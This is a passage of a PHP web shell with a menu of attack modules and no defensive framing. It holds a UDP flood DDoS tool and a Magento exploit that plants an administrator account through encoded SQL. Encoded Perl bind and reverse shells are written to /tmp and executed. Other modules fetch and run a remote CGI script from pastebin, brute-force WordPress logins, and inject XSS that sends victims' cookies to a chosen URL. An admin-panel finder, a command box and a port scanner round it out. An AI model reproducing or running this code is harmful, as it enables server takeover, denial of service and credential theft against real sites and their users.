istrator/", "adminweb/", "user/", "users/", "dinkesadmin/", "retel/", "author/",
"panel/", "paneladmin/", "panellogin/", "redaksi/", "cp-admin/", "login@web/",
"admin1/", "admin2/", "admin3/", "admin4/", "admin5/", "admin6/", "admin7", "adm
in8", "admin9", "admin10", "master/", "master/index.php", "master/login.php", "o
perator/index.php", "sika/index.php", "develop/index.php", "ketua/index.php","re
daktur/index.php", "admin/index.php", "administrator/index.php", "adminweb/index
.php", "user/index.php", "users/index.php", "dinkesadmin/index.php", "retel/inde
x.php", "author/index.php", "panel/index.php", "paneladmin/index.php", "panellog
in/index.php", "redaksi/index.php", "cp-admin/index.php", "operator/login.php",
"sika/login.php", "develop/login.php", "ketua/login.php", "redaktur/login.php",
"admin/login.php", "administrator/login.php", "adminweb/login.php", "user/login.
php", "users/login.php", "dinkesadmin/login.php", "retel/login.php", "author/log
in.php", "panel/login.php", "paneladmin/login.php", "panellogin/login.php", "red
aksi/login.php", "cp-admin/login.php", "terasadmin/", "terasadmin/index.php", "t
erasadmin/login.php", "rahasia/", "rahasia/index.php", "rahasia/admin.php", "rah
asia/login.php", "dinkesadmin/", "dinkesadmin/login.php", "adminpmb/", "adminpmb
/index.php", "adminpmb/login.php", "system/", "system/index.php", "system/login.
php", "webadmin/", "webadmin/index.php", "webadmin/login.php", "wpanel/", "wpane
l/index.php", "wpanel/login.php", "adminpanel/index.php", "adminpanel/", "adminp
anel/login.php", "adminkec/", "adminkec/index.php", "adminkec/login.php", "admin
desa/", "admindesa/index.php", "admindesa/login.php", "adminkota/", "adminkota/i
ndex.php", "adminkota/login.php", "admin123/", "admin123/index.php", "dologin/",
"home.asp/","supervise/amdin", "relogin/adm", "checkuser", "relogin.php", "relo
gin.asp", "wp-admin", "registration", "suvervise", "superman.php", "member.php",
"home/admin","po-admin/","do_login.php", "bo-login", "bo_login.php/", "index.php
/admin", "admiiin.php", "masuk/adm","website_login/", "dashboard/admin", "dashbo
ard.php", "dashboard_adm", "admin123/login.php", "logout1/", "logout/","pengelol
a/login", "manageradm/", "logout.asp", "manager/adm", "pengelola/web","auth/pane
l", "logout/index.php", "logout/login.php", "controladm/", "logout/admin.php", "
adminweb_setting", "adm/index.asp", "adm.asp", "affiliate.asp", "adm_auth.asp",
"memberadmin.asp", "siteadmin/login.asp", "siteadmin/login", "paneldecontrol", "
cms/admin", "administracion.php", "/ADMON/", "administrador/", "panelc/", "admin
cp", "admcp", "cp", "modcp", "moderatorcp", "adminare", "cpanel", "controlpanel"
);
foreach ($adminlocales as $admin){
$headers = get_headers("$url$admin");
if (eregi('200', $headers[0])) {
echo "<a href='$url/$admin'>$url$admin</a> Nemu nih!<br />";
}
else {
echo "$url$admin Gk ketemu!<br />";
}
}
}
} elseif($_GET['do'] == 'ddos') {
?>

<html>
<form action=" " method="post">
<center><br><br><br>
Your IP: <font color="white"><b><?php echo $my_ip; ?></b></font>&nbsp;(Don't DoS
yourself nub)<br><br>
<table class="tabnet" style="width:333px;padding:0 1px;">
<th colspan="5">Ddos Tool</th>
<tr><tr><td>IP Target</td><td>:</td>
<td><input type="text" class="inputz" name="ip" size="48" maxlength="25" value
= "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = "
if ( this.value == '0.0.0.0' ) this.value = '';"/>
</td></tr>
<tr><td>Time</td><td>:</td>
<td><input type="text" class="inputz" name="time" size="48" maxlength="25" valu
e = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in s
econds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';
"/>
</td></tr>
<tr><td>Port</td><td>:</td>
<td><input type="text" class="inputz" name="port" size="48" maxlength="5" value
= "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if (
this.value == 'port' ) this.value = '';"/>
</td></tr></tr></table></b><br>
<input type="submit" class="inputzbut" name="fire" value=" Firee !!! ">
<br><br>
<center>
<font color="white">Seteleh selesai menggunakan tools ini segera refresh browsin
gmu
</center>
<body bgcolor="blue"
</form>
</center>
<?php
@$submit = $_POST['fire'];
if (isset($submit)) {
$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_POST['time'];
$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time + $exec_time;
for ($i = 0;$i < 65535;$i++) {
$out.= "X";
}
while (1) {
$packets++;
if (time() > $max_time) {
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(

($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_
time, 2) . " packets/s
";
}
} elseif($_GET['do'] == 'fake_root') {
ob_start();
$cwd = getcwd();
$ambil_user = explode("/", $cwd);
$user = $ambil_user[2];
if($_POST['reverse']) {
$site = explode("\r\n", $_POST['url']);
$file = $_POST['file'];
foreach($site as $url) {
$cek = getsource("$url/~$user/$file");
if(preg_match("/hacked/i", $cek)) {
echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$us
er/$file</a> -> <font color=lime>Fake Root!</font><br>";
}
}
} else {
echo "<center><form method='post'>
Filename: <br><input type='text' name='file' value='deface.html' size='5
0' height='10'><br>
User: <br><input type='text' value='$user' size='50' height='10' readonl
y><br>
Domain: <br>
<textarea style='width: 450px; height: 250px;' name='url'>";
reverse($_SERVER['HTTP_HOST']);
echo "</textarea><br>
<input type='submit' name='reverse' value='Scan Fake Root!' style='width
: 450px;'>
</form><br>
NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /ho
me/user/ dan /home/user/public_html.</center>";
}
} elseif($_GET['do'] == 'cmd') {
echo "</center></table>";
echo "<form method='post'>
<font style='text-decoration: underline;'>".$user."@".gethostbyname($_SE
RVER['HTTP_HOST']).":~# </font>
<input type='text' size='30' height='10' name='cmd'><input type='submit'
name='do_cmd' value='>>'>
</form>";
if($_POST['do_cmd']) {
echo "<pre>".exe($_POST['cmd'])."</pre>";
}
} elseif($_GET['do'] == 'magento') {
?>
<font color="white">
<center>
<font face="monospace"><br>
<h2> Magent0 Auto Add admin </h2><br>
<font color="white">
<form method="post" action="">
<textarea placeholder="http://site.com/" style="resize:none;background:#3366FF;
color:white;
width: 350px;
border:1px gray;
padding:5px;

height: 90px;" name="target" required></textarea><br><br>


<input style="background:#3366FF;
color:blue;
border:1px gray;
padding:1px;
width:50px;
height:30px" type=submit name=submit value="Start"><br>
</form>
</p>
<?php
error_reporting(0);
set_time_limit(0);
function bersihkan($htmltags) {
$htmltags = str_replace('<span class="price">','',$htmltags);
$htmltags = str_replace('</span>','',$htmltags);
return $htmltags;
}
$postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0e
VtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ
0FUKCBAU0FMVCAsICdzdHVwaWQ0OCcpICksIENPTkNBVCgnOicsIEBTQUxUICkpO1NFTEVDVCBARVhUU
kEgOj0gTUFYKGV4dHJhKSBGUk9NIGFkbWluX3VzZXIgV0hFUkUgZXh0cmEgSVMgTk9UIE5VTEw7SU5TR
VJUIElOVE8gYGFkbWluX3VzZXJgIChgZmlyc3RuYW1lYCwgYGxhc3RuYW1lYCxgZW1haWxgLGB1c2Vyb
mFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2Fjd
Gl2ZWAsYGV4dHJhYCxgcnBfdG9rZW5gLGBycF90b2tlbl9jcmVhdGVkX2F0YCkgVkFMVUVTICgnRmlyc
3RuYW1lJywnTGFzdG5hbWUnLCdlbWFpbEBleGFtcGxlLmNvbScsJ3N0dXBpZCcsQFBBU1MsTk9XKCksM
CwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZ
Cx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgK
DEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ
3N0dXBpZCcpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZ
XBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
$postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=stupid&login%5Bpasswor
d%5D=stupid48";
$postdwn = "username=stupid&password=stupid48";
$pageadm = "/admin/Cms_Wysiwyg/directive/index/";
$pagelog = "/admin/";
$pagedwn = "/downloader/";
function stupid_CURL($url,$data,$page) {
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url.$page);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; e
n-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
$headers = array();
$headers[] = 'Content-Type: application/x-www-form-urlencoded';
curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt ($ch, CURLOPT_HEADER, 1);
$result = curl_exec ($ch);
curl_close($ch);
return $result;
}
print $banner;

if(isset($_POST['target'])){
$j=explode("\r\n",$_POST['target']);
foreach($j as $site){
echo'<font color="white">';
print "Checking, Please wait!
<br>";
echo'</font>';
$hajar = stupid_CURL($site , $postadm, $pageadm);
if(preg_match('#200 OK#', $hajar)) {
$expres = "Success";
$ceklog = stupid_CURL($site , $postlog, $pagelog);
if(preg_match('#302 Moved#', $ceklog)) {
preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
foreach($match as $val)
{
$ltm = $val[0];
$avo = $val[1];
break;
}
$admlog = "Success";
$user = "stupid";
$pass = "stupid48";
$cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
if(preg_match('#Return to Admin#', $cekdwn)) {
$dwnlog = "Login Success";
}else {
$dwnlog = "Login Failed";
}
}else {
$admlog = "Failed";
$user = "NULL";
$pass = "NULL";
}
}else {
$admlog = "Failed";
$expres = "Failed";
$user = "NULL";
$pass = "NULL";
$dwnlog = "Login Failed";
$ltm = "NULL";
$avo = "NULL";
}
$logger = '
<br>
<font color="blue">
<h4>[ '.$site.' ]</h4></font><br>
Exploiting
: <font color="blue">'.$expres.'</font><br>
Login Admin
: <font color="blue">'.$admlog.'</font><br>
Lifetime Sales: <font color="gold">'.bersihkan($ltm).'</font><br>
Average Order : <font color="gold">'.bersihkan($avo).'</font><br>
Downloader
: <font color="blue">'.$dwnlog.'</font><br>
Username
:<font color="cyan"><b> '.$user.'</font></b><br>
Password
:<font color="cyan"><b> '.$pass.'</font></b><br>
<br><br>
<font color="blue">
<h2>--------------</h2>';

echo $logger;
}
}
} elseif($_GET['do'] == 'network') {
echo "<form method='post'>
<u>Bind Port:</u> <br>
PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
<input type='submit' name='sub_bp' value='>>'>
</form>
<form method='post'>
<u>Back Connect:</u> <br>
Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['
REMOTE_ADDR']."'>&nbsp;&nbsp;
PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
<input type='submit' name='sub_bc' value='>>'>
</form>";
$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUk
dWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1
RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW
4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUy
wzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUy
k7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcG
lkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW
4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleG
VjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
if(isset($_POST['sub_bp'])) {
$f_bp = fopen("/tmp/bp.pl", "w");
fwrite($f_bp, base64_decode($bind_port_p));
fclose($f_bp);
$port = $_POST['port_bind'];
$out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
unlink("/tmp/bp.pl");
}
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXR
vbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkd
WWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSg
ndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWU
oIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVx
uIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9
wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4
pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
if(isset($_POST['sub_bc'])) {
$f_bc = fopen("/tmp/bc.pl", "w");
fwrite($f_bc, base64_decode($bind_connect_p));
fclose($f_bc);
$ipbc = $_POST['ip_bc'];
$port = $_POST['port_bc'];
$out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
unlink("/tmp/bc.pl");
}
} elseif($_GET['do'] == 'cgi') {
$cgi_dir = mkdir('idx_cgi', 0755);
$file_cgi = "idx_cgi/cgi.izo";

$isi_htcgi = "AddHandler cgi-script .izo";


$htcgi = fopen(".htaccess", "w");
$cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
$cgi = fopen($file_cgi, "w");
fwrite($cgi, $cgi_script);
fwrite($htcgi, $isi_htcgi);
chmod($file_cgi, 0755);
echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='
0' scrolling='no'></iframe>";
} elseif($_GET['do'] == 'brutewp') {
set_time_limit(0);
error_reporting(0);
class rintoar{
private
private
private
private

$host;
$user;
$open;
$lista;

public function banner() {


echo("
<html>
<head>
<title>Wp-Brute Force</title>
<style type='text/css'>
body{
font-family:'Arial';
font-size:20px;
background: black;
color:blue;
font-style:Italic;
}
.ext{
color: blue;
}
.area{
width:400px;
height:350px;
resize:none;
}
</style>
</head>
<body>
<h1><center>WordPress Brute Force</center></h1>
<form action='' method='POST'>
<center>Host:<input type='text' name='host' size='40' > </center><br>
<center>User:<input type='text' name='user' size='25'>
</center><br>
<center>Wordlist</center>
<center><textarea class='area' name='lista'></textarea><br><br><center>
<center><input type='Submit' value='Start'></center>
</form>
</body>
</html>");
}

public function extract_post() {


$this->host = $_POST["host"];
$this->user = $_POST["user"];
$this->open = $_POST["lista"];
}
public function Xregex() {
if(preg_match("@/wp-login.php@", $this->host)) {
return true;
} else {
$this->host = $_POST["host"]."/wp-login.php";
}
}
public function brute() {
$lista = array_filter(explode("\n", $this->open));
foreach($lista as $this->lista) {
for($i=0; $i < count($this->lista); $i++) {
$this->Xcurl();
}
}
}
private function cool() {
echo "[+] Host:"."<font color='blue'>{$this->host}</font>";
echo " <br/>[+] User:"."<font color='blue'>{$this->user}</font>";
echo " <br/>[+] Pass:"."<font color='blue'>{$this->lista}</font>";
}
private function Xcurl() {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $this->host);
curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->l
ista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
$exec = curl_exec($curl);
$http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
$this->cool();
if($http == 302) {
echo "<font color='#00FF00'> <br/>[+] Success [+] Tinggal Login
Aja</font><br>";
break;
} else {
echo "<font color='red'><br/>[+] Failed</font><br>";
}
curl_close($curl);
}
}
$wp = new rintoar();
$wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Fi
refox/40.0";
$wp->banner();
$wp->extract_post();
$wp->Xregex();
$wp->brute();
} elseif($_GET['do'] == 'http') {

?>
<style type="text/css">
</style>
<script type="text/javascript">
var alertbox = "<BODY ONLOAD=alert('1')>";
var marquee = "<marquee>0wned!</marquee>";
var cookie = "<ScRIPt>alert(document.cookie);<\/ScRiPt>";
window.onload = function() {
document.getElementById('use_custom').style.display = 'none';
document.getElementById('cookie_grab_script_div').style.display = 'none';
document.getElementById('get_poc').style.display = 'block';
document.getElementById('post_poc').style.display = 'none';
}
function SetMethod(frm){
if (document.getElementById('get').checked){
document.getElementById('post_poc').style.display = 'none';
document.getElementById('get_poc').style.display = 'block';
document.poc.method="GET";
}
else{
document.getElementById('post_poc').style.display = 'block';
document.getElementById('get_poc').style.display = 'none';
document.poc.method="POST";
}
}
function SetScenario(frm){
prefix = frm.prefix.value;
custom_value = frm.custom_injection.value;
cookie_grab_script=frm.cookie_grab_script.value;
if (frm.target.value == ""){
alert("Hey! Where is your target?")
return false;
}
else if (frm.vulnerability.value == ""){
alert("You should enter a vulnerable parameter")
return false;
}
document.poc.action=frm.target.value;
document.getElementById('lulz').name=frm.vulnerability.value;
if(document.getElementById('alertbox').checked) {
document.getElementById('lulz').value=prefix+alertbox;
}
if(document.getElementById('marquee').checked) {
document.getElementById('lulz').value=prefix+marquee;
}
if(document.getElementById('cookie').checked) {
document.getElementById('lulz').value=prefix+cookie;
}
if(document.getElementById('iframe').checked) {
document.getElementById('lulz').value=prefix+iframe;
}
if(document.getElementById('custom').checked) {
document.getElementById('lulz').value=prefix+custom_value;
}
if(document.getElementById('cookie_grab').checked){
document.getElementById('lulz').value=prefix+unescape("%3CScRiPt%3Edocument
.write%28%22%3Cimg%20src=%27")+cookie_grab_script+unescape("?%22%2bescape%28docu
ment.cookie%29%2b%22%27%3E%22%29")+";document.location='http://google.com';"+une
scape("%3c%2FScRiPt%3E");

}
document.poc.submit();
}
function SetHook(frm){
target = frm.target.value;
vulnerability = frm.vulnerability.value;
prefix = frm.prefix.value;
custom_value = frm.custom_injection.value;
custom_cookie_url = frm.cookie_grab_script.value;
if (target == ""){
alert("Hey! Where is your target?")
return false;
}
else if (vulnerability == ""){
alert("You should enter a vulnerable parameter")
return false;
}
if(document.getElementById('alertbox').checked) {
injection = prefix+alertbox;
}
if(document.getElementById('marquee').checked) {
injection = prefix+marquee;
}
if(document.getElementById('cookie').checked) {
injection = prefix+cookie;
}
if(document.getElementById('cookie_grab').checked) {
injection = prefix+unescape("%3CScRiPt%3Edocument.write%28%22%3Cimg%20src=%
27")+custom_cookie_url+unescape("?%22%2bescape%28document.cookie%29%2b%22%27%3E%
22%29")+";document.location='http://google.com';"+unescape("%3C%2FScRiPt%3E");
}
if(document.getElementById('iframe').checked) {
injection = prefix+iframe;
}
if(document.getElementById('custom').checked) {
injection = prefix+custom_value;
}
document.getElementById('injection').value=injection;
document.poc.action="hooker.php";
document.poc.submit();
}
function SetScript(frm) {
document.getElementById('use_custom').style.display = 'none';
document.getElementById('cookie_grab_script_div').style.display = 'none'
;
document.getElementById('line1').style.display = 'none';
if (document.getElementById('custom').checked) {
document.getElementById('use_custom').style.display = 'block';
document.getElementById('line1').style.display = 'block';
}else if (document.getElementById('cookie_grab').checked) {
document.getElementById('cookie_grab_script_div').style.display = 'block
';
document.getElementById('line1').style.display = 'block';
}
}
function LoadPoc(m,target,vuln,prefix,cook_grab_scr){
if(m=="GET"){
document.getElementById("get").checked=true;
}else{
document.getElementById("post").checked=true;

}
document.getElementById("target").value=target;
document.getElementById("vulnerability").value=vuln;
document.getElementById("prefix").value=unescape(prefix);
document.getElementById("cookie_grab_script").value=cook_grab_scr;
}
var cans=Array();
var frame=0;
var vStickLength=0.6*(-5+18*Math.random());
var vStickWidth=0.5+5*Math.random();
var vIncX=Math.random()*80+20;
var blocks=Array();
function Egg(){
window.scrollBy(0,100);
var canvas = document.createElement('canvas');
canvas.id = "CursorLayer";
canvas.width = 250;
canvas.height = 46;
canvas.style.zIndex = -2;
canvas.style.position = "relative";
canvas.style.padding = 5;
canvas.style.top = 0;
canvas.style.border = "1px solid";
var context = canvas.getContext('2d');
if(frame<55){
canvas.style.background = 'rgba('+parseInt(Math.random()*8+30)+','+parse
Int(Math.random()*8+30)+','+parseInt(100+Math.random()*155)+',1)';
context.font = 'italic 20pt Calibri';
context.fillStyle='rgba('+parseInt(Math.random()*25)+','+parseInt(Math.r
andom()*25)+','+parseInt(Math.random()*25)+',1)';
context.fillText('BigBrother!!!', 20, 30);
}else{
canvas.style.background = 'lime';
context.font = 'italic 20pt Courier';
context.fillStyle='black';
luck=Array("Remember","Use", "Squat", "Think", "Mayh3m!", "Hell!", "Dest
roy", "Fight", "Big Brother!", "Shit", "The", "Crypto", "Anarchy", "Truth", "Out
", "Ilegal", "Hack", "CCTV", "XSS", "Satellite", "SlaveMaster", "Money", "Bitcoi
n", "Will be")
context.fillText(luck[parseInt(luck.length*Math.random())], 20, 30);
}
if(frame<60) {
b=document.body.appendChild(canvas);
if(frame<60) blocks.push(b);
}else{
if(typeof blocks[frame-60]!="undefined") blocks[frame-60].style.
display="none";
}
var canvas = document.createElement('canvas');
canvas.style.zIndex = -666;
canvas.width = 360;
canvas.height = 598;
canvas.style.position = "fixed";
canvas.style.left=((frame*vIncX)%1024)+"px";
canvas.style.top="10px";
cans[frame]=canvas;
document.body.appendChild(canvas);
var ctx = canvas.getContext('2d');
ctx.moveTo(-15+Math.random(50),20);
for(i=0;i<5;i++){

ctx.strokeStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.
random()*255)+','+parseInt(Math.random()*255)+',0.1)';
ctx.lineWidth=3;
ctx.strokeStyle='rgba('+parseInt(Math.random()*255)+','+parseInt(Math.ra
ndom()*255)+','+parseInt(Math.random()*255)+',0.4)';
ctx.beginPath();
cx=60+100*Math.random();
cy=50+400*Math.random();
ctx.arc(cx,cy, i*8.5, 0, 2 * Math.PI, false);
ctx.fill();
ctx.strokeStyle='rgba('+parseInt(Math.random()*255)+','+parseInt(Math.ra
ndom()*255)+','+parseInt(Math.random()*255)+',0.1)';
ctx.fillStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.ra
ndom()*255)+','+parseInt(Math.random()*255)+',0.1)';
ctx.arc(cx*vStickWidth,cy*vStickLength, i*2.5, 0, 2 * Math.PI, false);
ctx.fill();
ctx.lineWidth = i/6;
ctx.strokeStyle = '#aa3300';
if(!(frame%5)){
for(j=0;j<=cans.length;j++){
if(typeof cans[j] === 'undefined') continue;
ctx=cans[j].getContext("2d");
ctx.strokeStyle = 'rgba('+parseInt(Math.random()*255)+',
'+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',1)';
}
}
}
setTimeout('Egg()', 200);
frame++;
}
</script>
</head><body>
<center>
<table>
<tr valign="middle">
<td align="center">
<br /><h2><a href="https://github.com/epsylon/xss-http-injector" target="_blank"
>XSS HTTP Inject0r!</a></h2> - 2014 - <a href="http://gplv3.fsf.org" target="_bl
ank">GPLv3</a><br /><font size=-1><a style="text-decoration:none;" href=# onClic
k=javascript:Egg()>"little rabbit"</a> version</font>
</td>
</tr>
</table>
<hr>
<form name="poc">
<table>
<tr>
<td><u>Method</u> (HTTP method):</td><td><table><tr><td><input type="radio" na
me="method" id="get" onclick="javascript:SetMethod();" checked value="GET">GET</
td><td><input type="radio" name="method" id="post" onclick="javascript:SetMethod
(this.form);" value="POST">POST</td></tr></table></td>
</tr>
<tr>
<td colspan=2>
<hr><script>var l=""+document.location;l=l.replace(/(.*)\/.*/,"$1/home.php")</sc
ript>
<label id="get_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <i
>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/get.html" target="_blan
k">SandBoX (HTTP-GET)</a> | <a onClick="javascript:LoadPoc('GET','sandbox/search
.php','search_text','%22>',l)" href=#>Load PoC</a></label>

<label id="post_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <


i>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/post.html" target="_bl
ank">SandBoX (HTTP-POST)</a> | <a onClick="javascript:LoadPoc('POST','sandbox/se
arch.php','search_text','%22>',l)" href=#>Load PoC</a></label>
<hr>
</td>
</tr>
<tr>
<td><u>Target</u> (Url to target's form):</td><td><input type="text" name="targ
et" size="35" id="target"> (<i>ex: http://vulnsite.com/contact.php</i>)</td>
</tr>
<tr>
<td><u>Vulnerability</u> (Vulnerable parameter):</td><td><input type="text" na
me="vulnerability" id="vulnerability"> (<i>ex: contact_email</i>)</td>
</tr>
<tr>
<td><u>Vector</u> (Code prefix to inject):</td><td><input type="text" name="pr
efix" size="35" id="prefix"> (<i>ex: "></i>)</td>
</tr>
</table>
<hr>
<table border="1" cellpadding="1" cellspacing="1">
<tr>
<td>JS Alert</td><td> <input type="radio" name="exploit" id="alertbox" onclick
="javascript:SetScript();" checked></td>
<td>Cookie Popup</td><td> <input type="radio" name="exploit" id="cookie" oncli
ck="javascript:SetScript();" /></td>
<td>HTML Marquee</td><td> <input type="radio" name="exploit" id="marquee" oncl
ick="javascript:SetScript();" /></td>
<td>Cookie Grabbing</td><td> <input type="radio" name="exploit" id="cookie_gra
b" onclick="javascript:SetScript();" /></td>
<td>Defacement</td><td> <input type="radio" name="exploit" id="iframe" onclick
="javascript:SetScript();" /></td>
<td>Custom Script</td><td> <input type="radio" name="exploit" id="custom" oncl
ick="javascript:SetScript();" /></td>
</tr>
</table>
<hr id="line1" style="display:none">
<div id="use_custom" style="display:none">
Custom injection: <input type="text" name="custom_injection" size="92">
</div>
<div id="cookie_grab_script_div" style="display:none">
Grabbing URL: <input type="text" id="cookie_grab_script" name="cookie_grab_scri
pt" size="92">
</div>
<hr>
<input type="hidden" id="lulz"></input>
<input type="hidden" name="injection" id="injection"></input>
<table cellpadding="6" cellspacing="6" border="0">
<tr>
<td><input type="submit" value="Inject!" onClick="return SetScenario(this.form
)" style="padding: 10px; font-weight:bold;"></td>
<td><input type="submit" value="Hooker" onClick="return SetHook(this.form)" st
yle="padding: 10px; font-weight:bold;"></td>
</tr>
</table>
</form>
</body>
</html>
<?php

} elseif($_GET['do'] == 'whois') {
@set_time_limit(0);
@error_reporting(0);
function sws_domain_info($site)
{
$getip = @file_get_contents("http://networktools.nl/whois/$site");
flush();
$ip = @findit($getip,'<pre>','</pre>');
return $ip;
flush();
}
function sws_net_info($site)
{
$getip = @file_get_contents("http://networktools.nl/asinfo/$site");
$ip = @findit($getip,'<pre>','</pre>');
return $ip;
flush();
}
function sws_site_ser($site)
{
$getip = @file_get_contents("http://networktools.nl/reverseip/$site");
$ip = @findit($getip,'<pre>','</pre>');
return $ip;
flush();
}
function sws_sup_dom($site)
{
$getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslo
okup?subd=".$site."&Search+subdomains=Find+subdomains");
$ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="tex
t/javascript">');
return $ip;
flush();
}
function sws_port_scan($ip)
{
$list_post = array('80','21','22','2082','25','53','110','443','143');
foreach ($list_post as $o_port)
{
$connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
if($connect)
{
echo ' $ip : $o_port ??? <u style="color: blue">Open</u> <br /><br />';
flush();
}
}
}
function findit($mytext,$starttag,$endtag) {
$posLeft = @stripos($mytext,$starttag)+strlen($starttag);
$posRight = @stripos($mytext,$endtag,$posLeft+1);
